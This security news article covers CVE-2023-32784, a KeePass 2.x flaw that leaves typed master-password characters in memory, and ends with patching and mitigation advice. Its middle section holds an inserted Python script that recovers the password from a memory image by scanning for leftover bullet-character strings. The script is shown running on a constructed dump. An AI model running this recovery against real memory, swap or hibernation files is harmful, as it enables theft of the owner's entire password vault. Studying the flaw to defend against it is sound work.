KeePass Vulnerability Allows Master Passwords to be Obtained from the Memory

A vulnerability has been identified in the KeePass password manager that allows an attacker with access to a memory image of the machine to recover the cleartext master password, provided the password was typed in on the keyboard. A password pasted from the clipboard does not leak in this way.

The vulnerability has been assigned the Common Vulnerabilities and Exposures identifier CVE-2023-32784. KeePass has yet to issue a patch to address the flaw but is expected to do so in the upcoming release of KeePass 2.54, which is due in early June. The vulnerability affects all 2.x versions of the software released before that fix. KeePassXC, Strongbox, and KeePass 1.x are not affected.

The flaw was reported by a security researcher who goes by the handle vdohney, who published a simple proof-of-concept tool, KeePass Master Password Dumper, that exploits it and is mostly able to recover the master password from memory, apart from the first character. The tool does not need to execute any code on the targeted system; it only needs a memory dump obtained by other means. In the security report published on GitHub, the researcher explained, “it doesn’t matter where the memory comes from – can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), various crash dumps or RAM dump of the entire system. It doesn’t matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it’s been since then.” (Dominik Reichl, the KeePass developer, has confirmed the issue and is preparing the fix for 2.54.)

The flaw is in the custom text box, SecureTextBoxEx, that KeePass 2.x uses for password entry. Every keystroke causes the control to build a new string in which the previously typed characters are masked as bullet characters (U+2022) and the newly typed character is appended in the clear, so typing "secret" leaves behind "•e", "••c", "•••r", and so on. Because .NET strings are immutable and managed by the garbage collector, the application cannot reliably wipe these leftovers, and they remain in process memory (and wherever that memory is later written: page file, hibernation file, crash dumps). Scanning a memory image for runs of bullets followed by a single character therefore yields the likely character at each position of the password; only the first character, which is never preceded by a bullet, cannot be recovered this way.
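The recovery technique described above, written out as an added example rather than code from the page or from the published proof-of-concept: the script scans a byte string for UTF-16LE runs of U+2022 followed by one code unit, tallies the candidate character at each position, and assembles the best guess. The memory image is constructed here (filler bytes around simulated leftover fragments from a password typed twice, plus one stale fragment from a different entry); the fragment layout "N-1 bullets then the N-th character" is the assumption the whole technique rests on, and all function names are this example's own.

```python
"""
Added example (not the page's or the PoC author's code): reconstruct a
KeePass master password from a memory image by finding the leftover
strings SecureTextBoxEx leaves behind (CVE-2023-32784).

Assumption: each keystroke N leaves a .NET string of N-1 bullet
characters (U+2022) followed by the N-th typed character, stored as
UTF-16LE. Position 1 never appears on its own and cannot be recovered.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict

BULLET = "\u2022"
# UTF-16LE encoding of U+2022 is the byte pair 22 20. Match one or more
# bullets followed by a code unit that is *not* another bullet; the
# negative lookahead stops the greedy '+' from backtracking and capturing
# a bullet as the "typed character" at the end of the buffer.
LEFTOVER = re.compile(rb"(?:\x22\x20)+(?!\x22\x20)([\x00-\xff]{2})")

# Constructed filler: ascending bytes 00..ff never contain the pair 22 20.
FILLER = bytes(range(256))


def leftover_strings(password: str) -> list[bytes]:
    """Simulate the fragments left in memory when `password` is typed."""
    return [
        (BULLET * (n - 1) + password[n - 1]).encode("utf-16-le")
        for n in range(2, len(password) + 1)
    ]


def build_dump(fragments: list[bytes]) -> bytes:
    """Constructed memory image: fragments scattered among filler bytes."""
    out = bytearray()
    for frag in fragments:
        out += FILLER[: (len(out) * 7) % 200 + 8]  # irregular, deterministic gaps
        out += frag
    out += FILLER
    return bytes(out)


def recover_candidates(dump: bytes) -> dict[int, Counter]:
    """Map 1-based password position -> Counter of candidate characters."""
    cands: dict[int, Counter] = defaultdict(Counter)
    for m in LEFTOVER.finditer(dump):
        n_bullets = (m.start(1) - m.start()) // 2
        ch = m.group(1).decode("utf-16-le", errors="replace")
        cands[n_bullets + 1][ch] += 1
    return dict(cands)


def best_guess(cands: dict[int, Counter]) -> str:
    """Most frequent candidate per position; '?' where nothing was found."""
    if not cands:
        return ""
    guess = ["?"]  # position 1 is never present in the dump
    for pos in range(2, max(cands) + 1):
        c = cands.get(pos)
        guess.append(c.most_common(1)[0][0] if c else "?")
    return "".join(guess)


def demo() -> tuple[str, dict[int, dict[str, int]]]:
    """Run the recovery against a constructed dump and return the result."""
    password = "Correct-Horse"  # constructed sample, typed twice
    stale = (BULLET * 2 + "Z").encode("utf-16-le")  # fragment from another entry
    dump = build_dump(leftover_strings(password) * 2 + [stale])
    cands = recover_candidates(dump)
    return best_guess(cands), {p: dict(c) for p, c in sorted(cands.items())}


if __name__ == "__main__":
    guess, per_position = demo()
    print("best guess:", guess)
    for pos, counts in per_position.items():
        print(f"  position {pos}: {counts}")
```

Against a real process or hibernation image the same scan produces several candidates per position (old passwords, other entries typed into the same control, random byte coincidences), which is why the output is a ranked list per position rather than a single string; the counts are what let an attacker tell the current master password from stale fragments.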

KeePass users should update to version 2.54 as soon as it is released in June. If KeePass has been used for some time, the master password, and potentially other passwords typed into the same control, are likely to be present in the page file/swap file, hibernation file, and any crash dumps, from which they could be recovered even after the fix is installed. Until the update is available, users can reduce the exposure by changing the master password, restarting the computer, deleting the hibernation file and page file/swap file, and securely overwriting free space on the disk so the deleted copies cannot be carved back. For maximum assurance, a fresh installation of the operating system removes any remaining copies.

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news